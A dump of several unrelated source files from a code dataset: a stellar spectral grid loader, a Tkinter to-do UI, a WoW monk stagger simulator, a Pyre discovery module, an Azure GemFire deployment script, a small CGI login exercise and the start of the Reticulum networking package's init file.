pd.read_hdf(hdf_fname, 'wavelength').values[:, 0]\n wavelength = u.Quantity(wavelength, meta['wavelength_unit'])\n\n if meta['grid_type'] == 'log':\n R = meta['R']\n R_sampling = meta['R_sampling']\n else:\n raise ValueError('No other grid_type than log is supported')\n\n parameter_defaults = {}\n parameter_defaults = {param: index.loc[index.index[0], param]\n for param in interpolate_parameters}\n\n class_dict = {}\n for param in interpolate_parameters:\n if parameter_defaults[param] is None:\n param_descriptor = Parameter()\n else:\n param_descriptor = Parameter(default=parameter_defaults[param])\n\n class_dict[param] = param_descriptor\n\n class_dict['__init__'] = BaseSpectralGrid.__init__\n\n SpectralGrid = type('SpectralGrid', (BaseSpectralGrid, ), class_dict)\n\n initial_parameters = {item: index[item].iloc[0]\n for item in interpolate_parameters}\n logger.info('Initializing spec grid')\n spec_grid = SpectralGrid(wavelength, index[interpolate_parameters], fluxes,\n R=R, R_sampling=R_sampling, flux_unit=flux_unit,\n **initial_parameters)\n\n logger.info('Setting grid extent')\n for param in interpolate_parameters:\n uniform_prior = UniformPrior(index[param].min(), index[param].max())\n parameter = getattr(spec_grid, param)\n parameter.prior = uniform_prior\n\n 
return spec_grid\n","sub_path":"starkit/gridkit/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":4225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"90662983","text":"\nfrom .ui_tab_in_notebook import *\nfrom .ui_show_list import *\nfrom .ui_show_item import *\nfrom .ui_edit_item import *\n\nclass UIItemList(UITabInNB):\n def __init__(self, parent, tab_name, organizer): \n super().__init__(parent, tab_name)\n self.item_list = organizer.item_list\n self.priority_list = organizer.priority_list\n self.contact_info_book = organizer.contact_info_book\n self.show = 'current list only'\n self.frame_show_list = UIShowList(self)\n self.frame_show_item = UIShowItem(self)\n self.frame_edit_item = UIEditItem(self)\n\n def set_controller(self, controller):\n self.controller = controller\n self.frame_show_list.controller = controller\n self.frame_show_item.controller = controller\n self.frame_edit_item.controller = controller\n\n def refresh_list(self, new_list=None):\n self.frame_show_list.refresh(new_list)\n self.frame_show_list.grid(row=0, column=0, sticky=N)\n \n def refresh_item(self, item=None):\n self.frame_show_item.refresh(item)\n self.frame_edit_item.grid_remove()\n self.frame_show_item.grid(row=0, column=1, sticky=N)\n\n def edit_item_mode(self, item):\n self.frame_edit_item.refresh(item)\n self.frame_show_item.grid_remove()\n self.frame_edit_item.grid(row=0, column=1, sticky=N)\n\n\n\n","sub_path":"want_to_list/view/ui_item_list.py","file_name":"ui_item_list.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"464140620","text":"#\n# 325 = 1% haste\n# 350 = 1% mastery\n# 350 = 1% crit\n# 400 = 1% vers damage/healing = 0.5% damage reduction\n#\n\nimport copy, math, time, os, random, sys\nimport multiprocessing\nfrom events import *\nfrom sim import *\n\nconfigtemplate = {\n\t\"base stagger\": 0.35,\n\t\"isb stagger\": 0.40,\n\t\"brew recharge time\": 18,\n\t\"brew max charges\": 4,\n\t\"tank health\": 600,\n\t\"base avoidance\": 10,\n\t\"haste\": 10,\n\t\"mastery\": 15,\n \"crit chance\": 0.25,\n\t\"versatility dr\": 2.5,\n\t\"versatility healing\": 5,\n\t\"stagger ticks\": 20,\n\t\"overflow chance\": 0.3,\n\t\"celestial fortune multi\": 0.6,\n\t\"talent 15\": \"\",\t#\n\t\"talent 30\": \"\",\t# \n\t\"talent 45\": \"\",\t# \"lb\" \"gotm\"\n\t\"talent 60\": \"\",\t#\n\t\"talent 75\": \"\",\t#\n\t\"talent 90\": \"\",\t#\n\t\"talent 100\": \"\"\t# \"ed\" \"fm\" \"ht\"\n}\n\ndef hiddenmultithreadedsim(bossdamageevents,\n\t\t\t\tpurifystaggerevents,\n\t\t\t\tisbuseevents,\n\t\t\t\tbreaktime,\n\t\t\t\tconfig,\n\t\t\t\tgotothreshold,\n\t\t\t\tsimulations,\n\t\t\t\toutput):\n\t\n\tres = {}\n\t\n\tfor a in range(0, simulations):\n\t\ttdevs = copy.deepcopy(bossdamageevents)\n\t\ttpevs = copy.deepcopy(purifystaggerevents)\n\t\ttcsevs = copy.deepcopy(isbuseevents)\n\t\ttres = calcDamage(bossdamageevents=tdevs,\n\t\t\t\t\tpurifystaggerevents=tpevs,\n\t\t\t\t\tisbuseevents=tcsevs,\n\t\t\t\t\tbreaktime=breaktime, \n\t\t\t\t\tgotothreshold=gotothreshold,\n\t\t\t\t\tconfig=config)\n\t\tfor k, v in tres.items():\n\t\t\tif k in res.keys():\n\t\t\t\tif (type(v) == type(int()) or type(v) == type(float())):\n\t\t\t\t\tres[k] = res[k] + v\n\t\t\t\telif (k == \"playerclass\"):\n\t\t\t\t\tpass\n\t\t\t\telse:\n\t\t\t\t\tprint(\"non num value in res\")\n\t\t\telse:\n\t\t\t\tres[k] = v\n\t\n\tfor k, v in res.items():\n\t\tif (type(v) == type(int()) or 
type(v) == type(float())):\n\t\t\tres[k] = v / simulations\n\toutput.put(res)\n\t\ndef multithreadedsim(bossdamageevents=[],\n\t\t\t\tpurifystaggerevents=[],\n\t\t\t\tisbuseevents = [],\n\t\t\t\tbreaktime=100,\n\t\t\t\tconfig=configtemplate,\n\t\t\t\tgotothreshold=0.3,\n\t\t\t\tsimulations=100,\n\t\t\t\tthreadsnum=4):\n\t\t\t\t\n\tqueue = multiprocessing.Queue()\n\tthreads = []\n\t\n\tfor a in range(0, threadsnum):\n\t\ttdevs = copy.deepcopy(bossdamageevents)\n\t\ttpevs = copy.deepcopy(purifystaggerevents)\n\t\ttcsevs = copy.deepcopy(isbuseevents)\n\t\ttconf = copy.deepcopy(config)\n\t\tthreads.append(multiprocessing.Process(target=hiddenmultithreadedsim,\n\t\t\t\t\t\targs=(tdevs,\n\t\t\t\t\t\t\t\ttpevs,\n\t\t\t\t\t\t\t\ttcsevs,\n\t\t\t\t\t\t\t\tbreaktime,\n\t\t\t\t\t\t\t\ttconf,\n\t\t\t\t\t\t\t\tgotothreshold,\n\t\t\t\t\t\t\t\tint(simulations/threadsnum),\n\t\t\t\t\t\t\t\tqueue)))\n\t\t#print(str(threads[a]) + str(threads[a].is_alive()))\n\t\tthreads[a].start()\n\t\t\n\tfor p in threads:\n\t\tp.join()\n\tthreadres = [queue.get() for p in threads]\n\t\n\tres = {}\n\tfor tres in threadres:\n\t\t#print(str(tres))\n\t\tfor k, v in tres.items():\n\t\t\tif k in res.keys():\n\t\t\t\tif (type(v) == type(int()) or type(v) == type(float())):\n\t\t\t\t\tres[k] = res[k] + v\n\t\t\t\telif (k == \"playerclass\"):\n\t\t\t\t\tpass\n\t\t\t\telse:\n\t\t\t\t\tprint(\"non num value in res\")\n\t\t\telse:\n\t\t\t\tres[k] = v\n\t\t\n\tfor k, v in res.items():\n\t\tif (type(v) == type(int()) or type(v) == type(float())):\n\t\t\tres[k] = v / threadsnum\n\t#print(str(res))\n\treturn res\n\ndef statscaling(bossdamageevents=[],\n\t\t\t\tpurifystaggerevents=[],\n\t\t\t\tisbuseevents = [],\n\t\t\t\tbreaktime=100,\n\t\t\t\tconfig=configtemplate,\n\t\t\t\tgotothreshold=0.3,\n\t\t\t\tsimulations=100,\n\t\t\t\tscaling=20):\n\t\n\ttconf = copy.deepcopy(config)\n\ttdevs = copy.deepcopy(bossdamageevents)\n\ttpevs = copy.deepcopy(purifystaggerevents)\n\ttcsevs = copy.deepcopy(isbuseevents)\n\tbaseres = multithreadedsim(bossdamageevents=bossdamageevents,\n\t\t\t\t\tpurifystaggerevents=purifystaggerevents,\n\t\t\t\t\tisbuseevents=isbuseevents,\n\t\t\t\t\tbreaktime=breaktime, \n\t\t\t\t\tconfig=tconf,\n\t\t\t\t\tgotothreshold=gotothreshold,\n\t\t\t\t\tsimulations=simulations)\n\tprintresults(baseres)\n\tprint(\"scaling haste\")\n\ttconf = copy.deepcopy(config)\n\ttconf[\"haste\"] = tconf[\"haste\"] + scaling / 325\n\thasteres = multithreadedsim(bossdamageevents=bossdamageevents,\n\t\t\t\t\tpurifystaggerevents=purifystaggerevents,\n\t\t\t\t\tisbuseevents=isbuseevents,\n\t\t\t\t\tbreaktime=breaktime, \n\t\t\t\t\tconfig=tconf,\n\t\t\t\t\tgotothreshold=gotothreshold,\n\t\t\t\t\tsimulations=simulations)\n\tprintresults(hasteres)\n\t#print(\"TMI: \" + str(round(hasteres[\"tmi\"]/1000, 3)) + \"k ISB used:\" + str(hasteres[\"isb used\"]) + \" PB used:\" + str(hasteres[\"pb used\"]))\n\tprint(\"scaling mastery\")\n\ttconf = copy.deepcopy(config)\n\ttconf[\"mastery\"] = tconf[\"mastery\"] + scaling / 350\n\tmasteryres = multithreadedsim(bossdamageevents=bossdamageevents,\n\t\t\t\t\tpurifystaggerevents=purifystaggerevents,\n\t\t\t\t\tisbuseevents=isbuseevents,\n\t\t\t\t\tbreaktime=breaktime, \n\t\t\t\t\tconfig=tconf,\n\t\t\t\t\tgotothreshold=gotothreshold,\n\t\t\t\t\tsimulations=simulations)\n\t#print(\"TMI: \" + str(round(masteryres[\"tmi\"]/1000, 3)) + \"k ISB used:\" + str(masteryres[\"isb used\"]) + \" PB used:\" + str(masteryres[\"pb used\"]))\n\tprint(\"scaling crit\")\n\ttconf = copy.deepcopy(config)\n\ttconf[\"crit chance\"] = 
tconf[\"crit chance\"] + (scaling / 350) / 100\n\tcritres = multithreadedsim(bossdamageevents=bossdamageevents,\n\t\t\t\t\tpurifystaggerevents=purifystaggerevents,\n\t\t\t\t\tisbuseevents=isbuseevents,\n\t\t\t\t\tbreaktime=breaktime, \n\t\t\t\t\tconfig=tconf,\n\t\t\t\t\tgotothreshold=gotothreshold,\n\t\t\t\t\tsimulations=simulations)\n\t#print(\"TMI: \" + str(round(critres[\"tmi\"]/1000, 3)) + \"k ISB used:\" + str(critres[\"isb used\"]) + \" PB used:\" + str(critres[\"pb used\"]))\n\tprint(\"scaling versatility\")\n\ttconf = copy.deepcopy(config)\n\ttconf[\"versatility dr\"] = tconf[\"versatility dr\"] + scaling / 800\n\ttconf[\"versatility healing\"] = tconf[\"versatility healing\"] + scaling / 400\n\tversares = multithreadedsim(bossdamageevents=bossdamageevents,\n\t\t\t\t\tpurifystaggerevents=purifystaggerevents,\n\t\t\t\t\tisbuseevents=isbuseevents,\n\t\t\t\t\tbreaktime=breaktime, \n\t\t\t\t\tconfig=tconf,\n\t\t\t\t\tgotothreshold=gotothreshold,\n\t\t\t\t\tsimulations=simulations)\n\t#print(\"TMI: \" + str(round(versares[\"tmi\"]/1000, 3)) + \"k ISB used:\" + str(versares[\"isb used\"]) + \" PB used:\" + str(versares[\"pb used\"]))\n\t\n\tprint(\" STATS SCALING \")\n\tprint(\" | haste | mastery | crit | vers |\")\n\tprint(\" tmi: | %s | %s | %s | %s |\" % (\n\t\t(str(round((baseres[\"tmi\"] - hasteres[\"tmi\"]) / baseres[\"tmi\"] * 100, 2)) + \"%\").ljust(5, ' '),\n\t\t(str(round((baseres[\"tmi\"] - masteryres[\"tmi\"]) / baseres[\"tmi\"] * 100, 2)) + \"%\").ljust(5, ' '),\n\t\t(str(round((baseres[\"tmi\"] - critres[\"tmi\"]) / baseres[\"tmi\"] * 100, 2)) + \"%\").ljust(5, ' '),\n\t\t(str(round((baseres[\"tmi\"] - versares[\"tmi\"]) / baseres[\"tmi\"] * 100, 2)) + \"%\").ljust(5, ' ')))\n\tprint(\" dtps: | %s | %s | %s | %s |\" % (\n\t\t(str(round((baseres[\"damage taken\"] - hasteres[\"damage taken\"]) / baseres[\"damage taken\"] * 100, 2)) + \"%\").ljust(5, ' '),\n\t\t(str(round((baseres[\"damage taken\"] - masteryres[\"damage taken\"]) / baseres[\"damage taken\"] * 100, 2)) + \"%\").ljust(5, ' '),\n\t\t(str(round((baseres[\"damage taken\"] - critres[\"damage taken\"]) / baseres[\"damage taken\"] * 100, 2)) + \"%\").ljust(5, ' '),\n\t\t(str(round((baseres[\"damage taken\"] - versares[\"damage taken\"]) / baseres[\"damage taken\"] * 100, 2)) + \"%\").ljust(5, ' ')))\n\tprint(\" dps: | %s | %s | %s | %s |\" % (\n\t\t(str(round((hasteres[\"damage done\"] - baseres[\"damage done\"]) / baseres[\"damage done\"] * 100, 2)) + \"%\").ljust(5, ' '),\n\t\t(str(round((masteryres[\"damage done\"] - baseres[\"damage done\"]) / baseres[\"damage done\"] * 100, 2)) + \"%\").ljust(5, ' '),\n\t\t(str(round((critres[\"damage done\"] - baseres[\"damage done\"]) / baseres[\"damage done\"] * 100, 2)) + \"%\").ljust(5, ' '),\n\t\t(str(round((versares[\"damage done\"] - baseres[\"damage done\"]) / baseres[\"damage done\"] * 100, 2)) + \"%\").ljust(5, ' ')))\n\t\ndef printresults(res):\n\tif (res[\"playerclass\"] == \"monk\"):\n\t\tdamagetaken = res[\"damage taken\"]\n\t\taadamagetaken = res[\"autoattack damage taken\"]\n\t\tmagicdamagetaken = res[\"magic damage taken\"]\n\t\tdamagefromstagger = res[\"damage form stagger\"]\n\t\tdamagepurified = res[\"damage purified\"]\n\t\tisbused = res[\"isb used\"]\n\t\tpbused = res[\"pb used\"]\n\t\tdamagedone = res[\"damage done\"]\n\t\tsimduration = res[\"simulation duration\"]\n\t\ttmi = res[\"tmi\"]\n\t\tgotototalhealing = res[\"goto total healing\"]\n\t\tgotospawned = res[\"goto spawned\"]\n\t\texternalhealing = res[\"external healing\"]\n\t\temergencyhealing = 
res[\"emergency healing\"]\n\t\tcelestialfortunehealing = res[\"celestial fortune healing\"]\n\t\toverhealing = res[\"overhealing\"]\n\t\tprint(\"Total damage taken: \" + str(damagetaken))\n\t\tprint(\"Autoattack damage taken: \" + str(aadamagetaken))\n\t\tprint(\"Magic damage taken: \" + str(magicdamagetaken))\n\t\tprint(\"Damage from stagger: \" + str(damagefromstagger))\n\t\tprint(\"Damage purified: \" + str(damagepurified))\n\t\tprint(\"Percent damage purified: \" + str(damagepurified / (damagepurified + damagetaken)))\n\t\tprint(\"ISB used: \" + str(isbused))\n\t\tprint(\"PB used: \" + str(pbused))\n\t\tprint(\"Dps: \" + str(damagedone/simduration))\n\t\tprint(\"TMI: \" + str(round(tmi/1000, 3)) + \"k\")\n\t\tprint(\"external healing: \" + str(externalhealing))\n\t\tprint(\"celestial fortune healing: \" + str(celestialfortunehealing))\n\t\tprint(\"emergency healing: \" + str(emergencyhealing))\n\t\tprint(\"overhealing: \" + str(overhealing))\n\t\tprint(\"GotO total healing: \" + str(gotototalhealing) + \"\\n\")\n\t\ndef runSim():\n\t\n\tcurrentStagger = 0.8\n\tbaseavoidance = 10\n\tmastery = 0\n\tcurrentavoidance = 10\n\t\n\tbossdamageevents = []\n\tpurifystaggerevents = []\n\tisbuseevents = []\n\t\n\tfor a in range(0, 401):\n\t\tbossdamageevents.append(bossDamageEvent(time=1.5001 * a, damage=250, dodgeable=True))\n\tfor a in range(0, 31):\n\t\tbossdamageevents.append(bossDamageEvent(time=10.05 + 30 * a, damage=600, isPhisical=False, dodgeable=False, requireAM=True))\n\tfor a in range(0, 301):\n\t\tbossdamageevents.append(bossDamageEvent(time=10.05 + 2 * a, damage=65, isPhisical=False, dodgeable=False))\n\t# for a in range(0, 31):\n\t\t# purifystaggerevents.append(purifyStaggerEvent(time=10.1+30*a, purifymulti=0.5, forced=True))\n\t# for a in range(0, 31):\n\t\t# isbuseevents.append(isbUseEvent(time=7.9 + 30 * a, isbstagger=0.4, forced=True))\n\tbossdamageevents.sort(key=lambda e: e.time, reverse=True)\n\tpurifystaggerevents.sort(key=lambda e: e.time, reverse=True)\n\tisbuseevents.sort(key=lambda e: e.time, reverse=True)\n\t\n\tprint(\"scaling stats *10\")\n\tconf = copy.deepcopy(configtemplate)\n\tconf[\"talent 45\"] = \"gotm\"\n\tconf[\"brew recharge time\"] = 18\n\tconf[\"brew max charges\"] = 4\n\tconf[\"talent 100\"] = \"ed\"\n\tconf[\"haste\"] = 10\n\t#conf[\"mastery\"] = 25\n\ttdevs = copy.deepcopy(bossdamageevents)\n\ttpevs = copy.deepcopy(purifystaggerevents)\n\ttcsevs = copy.deepcopy(isbuseevents)\n\tstatscaling(bossdamageevents=tdevs,\n\t\t\t\tpurifystaggerevents=tpevs,\n\t\t\t\tisbuseevents=tcsevs,\n\t\t\t\tconfig=conf,\n\t\t\t\tgotothreshold=0.3,\n\t\t\t\tbreaktime=420,\n\t\t\t\tsimulations=1000,\n\t\t\t\tscaling=1000)\n\tprint(\"\\n\\n\")\n\t\nif __name__ == '__main__': \n\trunSim()\n\n\ta = input(\"ciao\")","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"544273262","text":"from pyre import Pyre\nfrom pyre import zhelper\nimport threading\nimport zmq\nimport logging\nimport json\nimport time\n\nfrom uniflex.core import modules\n\n__author__ = \"Piotr Gawlowicz\"\n__copyright__ = \"Copyright (c) 2015, Technische Universitat Berlin\"\n__version__ = \"0.1.0\"\n__email__ = \"{gawlowicz}@tkn.tu-berlin.de\"\n\n\nclass PyreDiscoveryMasterModule(modules.ControlApplication):\n def __init__(self, iface, groupName=\"uniflex\", downlink=None, sub=None,\n uplink=None, pub=None):\n super(PyreDiscoveryMasterModule, self).__init__()\n self.log = 
logging.getLogger('pyre_discovery_module.main')\n\n        pyreLogger = logging.getLogger('pyre')\n        pyreLogger.setLevel(logging.CRITICAL)\n\n        self.running = False\n        self.iface = iface\n        self.sub = downlink\n        if not self.sub:\n            self.sub = sub\n        self.pub = uplink\n        if not self.pub:\n            self.pub = pub\n        self.groupName = groupName\n        self.ctx = zmq.Context()\n\n    def _sending_announcements(self):\n        while self.running:\n            self.log.debug("Discovery Announcements:"\n                           " SUB={}, PUB={}"\n                           .format(self.sub, self.pub))\n\n            msg = json.dumps({'downlink': self.sub,\n                              'uplink': self.pub})\n            self.discovery_pipe.send(msg.encode('utf_8'))\n            time.sleep(2)\n\n    @modules.on_start()\n    def start_discovery_announcements(self):\n        self.log.debug("Start discovery announcements".format())\n        self.running = True\n        self.discovery_pipe = zhelper.zthread_fork(\n            self.ctx, self.discovery_task)\n\n        d = threading.Thread(target=self._sending_announcements)\n        d.setDaemon(True)\n        d.start()\n        return True\n\n    @modules.on_exit()\n    def stop_discovery_announcements(self):\n        self.log.debug("Stop discovery announcements".format())\n        if self.running:\n            self.running = False\n            self.discovery_pipe.send("$$STOP".encode('utf_8'))\n\n    def discovery_task(self, ctx, pipe):\n        self.log.debug("Pyre on iface : {}".format(self.iface))\n        n = Pyre(self.groupName, sel_iface=self.iface)\n        n.set_header("DISCOVERY_Header1", "DISCOVERY_HEADER")\n        n.join(self.groupName)\n        n.start()\n\n        poller = zmq.Poller()\n        poller.register(pipe, zmq.POLLIN)\n\n        while(True):\n            items = dict(poller.poll())\n\n            if pipe in items and items[pipe] == zmq.POLLIN:\n                message = pipe.recv()\n                # message to quit\n                if message.decode('utf-8') == "$$STOP":\n                    break\n\n                n.shout(self.groupName, message)\n\n        n.stop()\n","sub_path":"apps/discovery_pyre/uniflex_app_discovery_pyre/pyre_discovery_master_module.py","file_name":"pyre_discovery_master_module.py","file_ext":"py","file_size_in_byte":2736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"617330903","text":"from __future__ import print_function\n\nimport argparse\nimport json\nimport os.path\nimport subprocess\nimport sys\n\n# global variables\nazureregions = [\n    "australiaeast",\n    "australiasoutheast",\n    "brazilsouth",\n    "canadacentral",\n    "canadaeast",\n    "centralindia",\n    "centralus",\n    "eastasia",\n    "eastus",\n    "eastus2",\n    "japaneast",\n    "japanwest",\n    "koreacentral",\n    "koreasouth",\n    "northcentralus",\n    "northeurope",\n    "southcentralus",\n    "southeastasia",\n    "southindia",\n    "uksouth",\n    "ukwest",\n    "westcentralus",\n    "westeurope",\n    "westus",\n    "westus2"\n]\n\nvmtypes = [\n    "Standard_DS3_v2",\n    "Standard_DS4_v2",\n    "Standard_DS5_v2"\n]\n\ndef detect_git_branch():\n    """\n    returns 'master' in the event of any failure\n    """\n    process = subprocess.Popen(['git','branch'], stdout=subprocess.PIPE, stderr = subprocess.STDOUT)\n    out, err = process.communicate()\n    if process.returncode != 0:\n        return 'master'\n\n    for line in out.splitlines():\n        if '*' in line:\n            words = line.split()\n            if len(words) == 2:\n                return words[1]\n\n    return 'master'\n\ndef parseArgs():\n    parser = argparse.ArgumentParser(description = 'This script deploys a GemFire cluster on Azure')\n    allgroup = parser.add_argument_group('arguments')\n    allgroup.add_argument('--use-resource-group', help='The name of an existing resource group in which to deploy the GemFire cluster.')\n    allgroup.add_argument('--admin-username', required=True, help='The username for 
SSH access to the deployed virtual machines')\n allgroup.add_argument('--admin-password', required=False, help='SSH password. If provided, password login for will be enabled on all machined. Cannot be combined with the --public-ssh-key-file argument.')\n allgroup.add_argument('--public-ssh-key-file',type=argparse.FileType('rb'), required = False, help='The path to a file containing the public half of the ssh key you will use to access the servers. May be .pub or .pem')\n allgroup.add_argument('--create-resource-group', help='The name of a new resource group. The GemFire cluster will be deployed in this group after it is created. This option is incompatible with --use-resource-group.')\n allgroup.add_argument('--resource-group-location', help='The Azure location where the new resource group will be created. This option must be supplied if --create-resource-group is supplied.This option is incompatible with --use-resource-group.', choices = azureregions)\n allgroup.add_argument('--resource-location', required=True, help='The Azure location where the new resources will be created. This is separate from the location of the resource group.', choices = azureregions)\n allgroup.add_argument('--datanode-count', type=int, required = True, choices=range(2,16), help='Number of data nodes that will be deployed.')\n allgroup.add_argument('--vmtype', required = False, default=\"Standard_DS3_v2\", choices=vmtypes, help='Azure VM Type')\n\n try:\n args = parser.parse_args()\n except IOError as ioe:\n if ioe.filename is not None:\n sys.exit('{0}: {1}'.format(ioe.strerror, ioe.filename))\n else:\n sys.exit(ioe.strerror)\n\n if args.use_resource_group is None and args.create_resource_group is None:\n sys.exit('one of --use-resource-group and --create_resource_group must be supplied')\n\n if args.use_resource_group is not None and args.create_resource_group is not None:\n sys.exit('only one of --use-resource-group and --create_resource_group can be supplied')\n\n if args.create_resource_group is not None and args.resource_group_location is None:\n sys.exit('--resource_group_location must be supplied whenever --create-resource-group is given')\n\n if args.admin_password is not None and args.public_ssh_key_file is not None:\n sys.exit('only one of --public-ssh-key-file and --admin-password can be supplied')\n\n\n return args\n\ndef azrun_list(cmds):\n \"\"\"\n runs an Azure cli command and parses the results as json\n this method calls sys.exit if the command is not successful\n \"\"\"\n print('running ' + ' '.join(cmds))\n proc = subprocess.Popen(['az'] + cmds, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin = subprocess.PIPE , cwd = here)\n out, err = proc.communicate()\n if proc.returncode != 0:\n sys.exit('An error occurred while executing ({0}): {1}'.format('az ' + ' '.join(cmds), err))\n\n return json.loads(out)\n\ndef azrun(cmds):\n \"\"\"\n runs an Azure cli command and parses the results as json\n this method calls sys.exit if the command is not successful\n \"\"\"\n return azrun_list(cmds.split())\n\ndef resource_group_exists(rgname):\n \"\"\"\n return True if the resource group exists or False if not\n \"\"\"\n listgroups = azrun('group list')\n for group in listgroups:\n if group['name'] == rgname:\n return True\n\n return False\n\ndef create_resource_group(name, location):\n azrun('group create --name {0} --location {1}'.format(name, location))\n\ndef read_key_file(filehandle):\n \"\"\"\n If the filehandle.name ends with .pub, ssh-keygen will be invoked to convert it\n to .pem format. 
filehandle will be closed.\n    """\n    filename = filehandle.name\n    if filename.endswith('.pub'):\n        filehandle.close()\n        sshkeygen = subprocess.Popen(['ssh-keygen','-f',filename, '-e','-m','pem'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)\n        out, err = sshkeygen.communicate()\n        if sshkeygen.returncode != 0:\n            sys.exit('An error occurred while reading the key file ({0}) : {1}'.format(sshkeygen.returncode, out))\n        else:\n            sshkey = out\n    else:\n        sshkey = filehandle.read(16384)\n        filehandle.close()\n\n    return sshkey\n\n\nif __name__ == '__main__':\n    here = os.path.dirname(os.path.abspath(sys.argv[0]))\n\n    args = parseArgs()\n\n    # create the resource group, or verify an existing one\n    resourcegroup = None\n    if args.use_resource_group is not None :\n        if resource_group_exists(args.use_resource_group):\n            resourcegroup= args.use_resource_group\n        else:\n            sys.exit('The specified resource group ({0}) does not exist.'.format(args.use_resource_group))\n    else:\n        if resource_group_exists(args.create_resource_group):\n            sys.exit('Cannot create the resource group ({0}) because it already exists'.format(args.create_resource_group))\n\n        create_resource_group(args.create_resource_group, args.resource_group_location)\n        resourcegroup = args.create_resource_group\n\n    # retrieve the ssh key material\n    if args.public_ssh_key_file:\n        sshkey = args.public_ssh_key_file.read(16384)\n        args.public_ssh_key_file.close()\n        authentication_type = 'sshPublicKey'\n    else:\n        authentication_type = 'password'\n        sshkey = ''\n\n    # generate artifactsBaseUrl and gemfireOnAzureProjectTag\n    gitbranch = detect_git_branch()\n    artifactsBaseUrl = 'https://raw.githubusercontent.com/Pivotal-Data-Engineering/gemfire-azure/' + gitbranch\n\n    # compose the az command sshPublicKey\n\n    overrides = ['--parameters', 'adminUserName={0}'.format(args.admin_username)]\n    overrides.append('authenticationType={0}'.format(authentication_type))\n    overrides.append('adminPassword={0}'.format(args.admin_password))\n    overrides.append('sshPublicKey={0}'.format(sshkey))\n    overrides.append('gemfireDatanodeCount={0}'.format(args.datanode_count))\n    overrides.append('gemfireOnAzureProjectTag={0}'.format(gitbranch))\n    overrides.append('artifactsBaseUrl={0}'.format(artifactsBaseUrl))\n    overrides.append('location={0}'.format(args.resource_location))\n    overrides.append('datanodeVmType={0}'.format(args.vmtype))\n\n    print('Deployment has begun. This may take a while. Use the Azure portal to view progress...')\n\n    #debug azrun_list(['group', 'deployment', 'create','--debug', '--resource-group', resourcegroup, '--template-file', os.path.join(here, 'mainTemplate.json')] + overrides)\n    azrun_list(['group', 'deployment', 'create', '--resource-group', resourcegroup, '--template-file', os.path.join(here, 'mainTemplate.json')] + overrides)\n    print('GemFire cluster deployed.')\n","sub_path":"deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":8239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"319465457","text":"s_header = '''\n\n\n中转页面\n\n\n'''\ns_footer = '''\n\n\n'''\nadmin = '''\n\n

登陆成功\n单击下方链接,进入书籍修改界面\n开始修改\n'''\nunadmin = '''\n\n登陆失败\n单击下方链接,进入返回游客界面\n返回

    \n'''\nimport libs\nimport cgi\n\nform = cgi.FieldStorage()\nuser_name = form['u_name'].value\nuser_psw = form['u_psw'].value\n\nif user_name=='admin' and user_psw == '123456':\n s_body = admin\nelse:\n s_body = unadmin\n\ns_page = s_header + s_body + s_footer\nprint(s_page)\n","sub_path":"第9章-习题-wwwroot/cgi-bin/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"152857589","text":"import os\nimport sys\nimport glob\nimport time\nimport random\nimport threading\n\nfrom .Reticulum import Reticulum\nfrom .Identity import Identity\nfrom .Link import Link\nfrom .Transport import Transport\nfrom .Destination import Destination\nfrom .Packet import Packet\nfrom .Packet import PacketReceipt\nfrom .Resource import Resource\n\nmodules = glob.glob(os.path.dirname(__file__)+\"/*.py\")\n__all__ = [ os.path.basename(f)[:-3] for f in modules if not f.endswith('__init__.py')]\n\nLOG_CRITICAL = 0\nLOG_ERROR = 1\nLOG_WARNING = 2\nLOG_NOTICE = 3\nLOG_INFO = 4\nLOG_VERBOSE = 5\nLOG_DEBUG = 6\nLOG_EXTREME = 7\n\nLOG_STDOUT = 0x91\nLOG_FILE = 0x92\n\nloglevel = LOG_NOTICE\nlogfile = None\nlogdest = LOG_STDOUT\nlogtimefmt = \"%Y-%m-%d %H:%M:%S\"\n\nrandom.seed(os.urandom(10))\n\n_always_override_destination = False\n\nlogging_lock = threading.Lock()\n\ndef loglevelname(level):\n if (level == LOG_CRITICAL):\n return \"Critical\"\n if (level == LOG_ERROR):\n return \"Error\"\n if (level == LOG_WARNING):\n return \"Warning\"\n if (level == LOG_NOTICE):\n return \"Notice\"\n if (level == LOG_INFO):\n return \"Info\"\n if (level == LOG_VERBOSE):\n return \"Verbose\"\n if (level == LOG_DEBUG):\n return \"Debug\"\n if (level == LOG_EXTREME):\n return \"Extra\"\n \n return \"Unknown\"\n\ndef log(msg, level=3, _override_destination = False):\n global _always_override_destination\n \n if loglevel >= level:\n timestamp = time.time()\n logstring = \"[\"+time.strftime(logtimefmt)+\"] [\"+loglevelname(level)+\"] \"+msg\n logging_lock.acquire()\n\n if (logdest == LOG_STDOUT or _always_override_destination):\n print(logstring)\n logging_lock.release()\n\n elif (logdest == LOG_FILE and logfile != None):\n try:\n file = open(logfile, \"a\")\n file.write(logstring+\"\\n\")\n file.close()\n logging_lock.release()\n except Exception as e:\n logging_lock.release()\n _always_override_destination = True\n log(\"Exception occurred while writing log message to log file: \"+str(e), LOG_CRITICAL)\n log(\"Dumping future log events to console!\", LOG_CRITICAL)\n log(msg, level)\n \n\ndef rand():\n result = random.random()\n return result\n\ndef hexrep(data, delimit=True):\n delimiter = \":\"\n if not delimit:\n delimiter = \"\"\n hexrep = delimiter.join(\"{:02x}\".format(c) for c in data)\n return hexrep\n\ndef prettyhexrep(data):\n delimiter = \"\"\n hexrep = \"<\"+delimiter.join(\"{:02x}\".format(c) for c in data)+\">\"\n return hexrep\n\ndef panic():\n 